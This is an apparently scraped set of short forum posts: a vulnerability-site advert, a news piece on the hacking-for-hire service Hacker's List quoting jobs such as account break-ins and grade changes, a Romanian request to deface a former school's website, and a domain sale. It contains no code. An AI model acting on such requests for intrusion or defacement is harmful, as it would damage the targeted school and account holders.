vulnerabilities after the expiration of a 90-day disclosure deadline. Source: securityweek.com
  15. Hello all you have to visit the website . We established a website error to the website over the world . common errors such as SQL injection, Cross-site Scripting (XSS), Local File inclusion, Remote File Inclusion, Bug. Sincerely thank you trace our website. © Vulnerability VN 2015 - All Rights Reserved Share 230 Website SQL injection Link Here: Vulnerability VN
  16. Want to hack someone’s Facebook account? or Gmail account? or break into somebody’s network? But don’t have hacking skills to do so. There’s no need to worry at all. A new service is out there for you guys where you can search for professional hackers and hire them to accomplish any hacking task. Dubbed Hacker's List, a new service that offers to connect customers and "professional" hackers for hire. The service would made any tech-illiterate person capable to break into his boss' email address. This really sounds like something that happens mostly in movies. As if I’m hiring a hacker to accomplish crimes for me. Hacker’s List, the three-month old website — launched in November — has received over 500 hacking jobs so far and waiting for successful bidders. There are around 70 anonymous hacker profiles displayed on the website, but many of them are inactive at the moment. The website charges a fee on a project and payment is cleared on completion of the work, just like freelancing sites. Based on hours, prices of hackers range between $28 to $300 and full hacking projects range in prices of $100 to $5000. As you might expect, it's all done anonymously — collection of fees when tasks are completed, nobody knows the identity of those involved in doing the work. Several projects ranging from 'Hacking into Facebook account', 'Hacking into Gmail accounts', 'Hacking into websites' and 'Hacking into business accounts' are listed on the website. Surprisingly, many jobs listed on the website are for the customers pleading for hackers to break into school systems in order to change grades. You can have a look below to see the list of some jobs, together with the price customers are willing to pay: $300-$500: I need a hack for an Android Game called "Iron Force" developed by "Chillingo". It's a dynamic Server game, frequently updated. very hard to hack. I need a hack that give diamonds and cash on this game and if possible a auto-play robot system for my account. $10-$350: Need some info and messages from a Facebook account. Other jobs to come if successful. $300-$600: I need a hacker to change my final grade, it should be done in a week. $200-$300: Hack into a company email account. Copy all emails in that account. Give copies of the emails employer. Send spam emails confessing to lying and defamation of character to everyone in the email list. Hacker’s List, a website registered in New Zealand, has become the first website ever to provide "ethical hacking" services. While the activities listed on the site are clearly illegal in some cases, but the website asks users not to "use the service for any illegal purposes," as laid out in its 10-page long terms and conditions section. Source
  17. Salut! As dori si eu ceva vulnerabilitati la site-ul Scoala cu clasele I-VIII Mihai Eminescu Rosiorii de Vede . Este fosta mea scoala,si as vrea sa le transmit un "salut" .Daca se poate,cine ma poate ajuta,sa-i faca un deface (cu o poza funny sau orice) sau o stricaciune mai grava.Daca nu s-ar putea cele de mai sus,as dori un tutorial despre deface sau vulnerabilitati si cum sa le exploatez . Toate cele bune.
  18. Vand urmatoarele 3 domenii: (Fara probleme de copyright sau blackmarked de vreun search engine) 1. htpp://vigipay.com/ cu logo inclus: http://s7.postimage.org/pw6w858ah/vigipay.png (Professionally made 100% no copyright intended 100% unique) 2. runepost.com 3. vifed.com Le vand pe toate trei la un pret rezonabil via Western Union sau PayPal (aici mai discutam, o sa doresc mai multe detalii despre dumneavoastra.) .
×
×
  • Create New...